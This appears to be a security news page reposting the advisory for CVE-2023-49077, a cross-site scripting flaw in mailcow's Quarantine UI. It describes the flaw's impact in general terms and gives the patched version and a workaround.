Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-49077: XSS Vulnerability in Quarantine UI Allows Unauthorized Access and Data Manipulation

Mailcow: dockerized is an open source groupware/email suite based on docker. A Cross-Site Scripting (XSS) vulnerability has been identified within the Quarantine UI of the system. This vulnerability poses a significant threat to administrators who utilize the Quarantine feature. An attacker can send a carefully crafted email containing malicious JavaScript code. This issue has been patched in version 2023-11.

CVE
Open in Source
#xss#vulnerability#java#auth#docker

Impact

A Cross-Site Scripting (XSS) vulnerability has been identified within the Quarantine UI of the system. This vulnerability poses a significant threat to administrators who utilize the Quarantine feature, as it allows malicious actors to execute arbitrary code within the context of the admin’s session.

Exploitation of this vulnerability occurs when an attacker sends a carefully crafted email containing malicious JavaScript code. Upon opening or previewing the email within the Quarantine UI, the injected code is executed, enabling the attacker to compromise the administrator’s session. This can lead to unauthorized access, data manipulation, or the initiation of further attacks within the system.

Patches

Versions including 2023-11 and later

Workarounds

Disable Quarantine feature under System -> Configuration -> Options -> Quarantine

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE